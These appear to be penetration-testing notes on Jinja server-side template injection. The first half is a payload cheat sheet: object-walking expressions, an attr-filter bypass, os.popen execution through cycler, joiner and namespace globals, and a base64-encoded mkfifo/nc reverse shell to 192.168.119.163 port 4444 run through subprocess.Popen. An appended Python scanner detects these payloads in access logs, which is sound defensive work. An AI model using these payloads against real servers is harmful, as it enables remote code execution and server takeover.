SSTI

Jinja

Traditional Way

# get all subclasses which returns a list
{{ "".__class__.__mro__[1].__subclasses__() }}

Filter bypass

{% set start = "" %}
{% set class = start|attr("__class__") %}
{% set mro = class|attr("__mro__") %}
{% set subclasses = mro[1]|attr("__subclasses__")() %}

# get all subclasses which returns a list
{{ subclasses }}

Getting a shell

# base64 encode this payload
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.119.163 4444 >/tmp/f

{% set start = "" %}
{% set class = start|attr("__class__") %}
{% set mro = class|attr("__mro__") %}
{% set subclasses = mro[1]|attr("__subclasses__")() %}

# get all subclasses which returns a list
{{ subclasses }}

# find the index of subprocess.Popen, e.g. 1052
{{ subclasses[1052]("echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xMTkuMTYzIDQ0NDQgPi90bXAvZg== | base64 -d | /bin/bash", shell=True) }}

Running Code

Running Python Code

This can be chained into running OS code when request.args.a = import os;os.system('id')

{{namespace['__in''it__'].__builtins__.exec(request.args.a)}}

Running OS code

{{ cycler.__init__.__globals__.os.popen('id').read() }}

{{ joiner.__init__.__globals__.os.popen('id').read() }}

{{ namespace.__init__.__globals__.os.popen('id').read() }}
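Detection example, added here and not part of the original notes: the filter-bypass and code-execution payloads above show that matching on the bare string "__class__" in a request is not enough, because the attr filter, subscript access and adjacent string literals ('__in''it__') all hide the name from a naive check. The scanner below normalises those three obfuscations before looking for dunder names and process-spawning calls, and runs over a handful of constructed access-log lines (the client addresses, paths, timestamps and the log format are assumptions for this example). It is standalone stdlib Python and does not depend on Jinja or Flask.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Jinja delimiters: {{ expression }} and {% statement %}
TEMPLATE_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.DOTALL)
# two adjacent string literals, which Jinja concatenates: '__in''it__' -> '__init__'
ADJACENT_STR_RE = re.compile(r"""(['"])([^'"]*)\1\s*(['"])([^'"]*)\3""")
# the attr filter with a literal name: x|attr("__class__") -> x.__class__
ATTR_FILTER_RE = re.compile(r"""\|\s*attr\(\s*(['"])([^'"]*)\1\s*\)""")
# subscript with a literal key: x['__init__'] -> x.__init__
SUBSCRIPT_RE = re.compile(r"""\[\s*(['"])([^'"]*)\1\s*\]""")

# names that appear in the object-walking and code-execution payloads
DUNDER_NAMES = ("__class__", "__mro__", "__subclasses__", "__globals__",
                "__builtins__", "__init__", "__import__")
EXEC_NAMES = ("popen", "system", "subprocess", "exec", "eval")


def normalize_fragment(fragment):
    """Collapse the common obfuscations so a literal match on dunder names works."""
    prev, norm = None, fragment
    while norm != prev:  # repeat: 'a''b''c' needs two joins
        prev = norm
        norm = ADJACENT_STR_RE.sub(
            lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), norm)
    norm = ATTR_FILTER_RE.sub(r".\2", norm)
    norm = SUBSCRIPT_RE.sub(r".\2", norm)
    return norm


def analyze_value(value):
    """Return (severity, sorted indicators) for one request parameter value.

    'none'  - no template syntax at all
    'probe' - template delimiters only (e.g. {{7*7}})
    'high'  - delimiters plus object-walking or code-execution names
    """
    fragments = TEMPLATE_RE.findall(value)
    if not fragments:
        return "none", []
    indicators = set()
    for frag in fragments:
        norm = normalize_fragment(frag)
        if norm != frag:
            indicators.add("obfuscated")
        indicators.update(d for d in DUNDER_NAMES if d in norm)
        indicators.update(e for e in EXEC_NAMES if re.search(r"\b%s\b" % e, norm))
    indicators = sorted(indicators)
    severity = "high" if any(i != "obfuscated" for i in indicators) else "probe"
    return severity, indicators


# Common-log-format line (assumed format): client, timestamp, request line, status
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|PUT) (\S+) [^"]*" (\d{3})')


def scan_log(lines):
    """Return one finding per query parameter value that carries template syntax."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, target, status = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                severity, indicators = analyze_value(value)
                if severity != "none":
                    findings.append({"client": client, "time": ts, "param": name,
                                     "severity": severity, "indicators": indicators,
                                     "status": int(status)})
    return findings


# Constructed sample log: one benign user, one probing client, plus a braces-only
# value that must not trigger (it is not Jinja syntax).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /greet?name=Alice HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /greet?name=%7Bjson%7D HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /greet?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:02 +0000] "GET /greet?name=%7B%25%20set%20c%20%3D%20start%7Cattr(%22__class__%22)%20%25%7D HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /greet?name=%7B%7Bnamespace%5B%27__in%27%27it__%27%5D.__builtins__%7D%7D HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jan/2024:12:00:04 +0000] "GET /greet?name=%7B%7Bcycler.__init__.__globals__.os.popen(%27id%27).read()%7D%7D HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["param"], f["severity"], ",".join(f["indicators"]))
```

The normalisation step is the point: the second and third probing requests contain no literal "__class__" or "__init__" until the attr filter, the subscript and the split string literal are folded back, so a rule that matches only on raw dunder strings would rate them as a bare probe. The real fix is not to render user input as a template at all (pass it as a context variable instead); this scanner is for finding attempts in logs after the fact.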
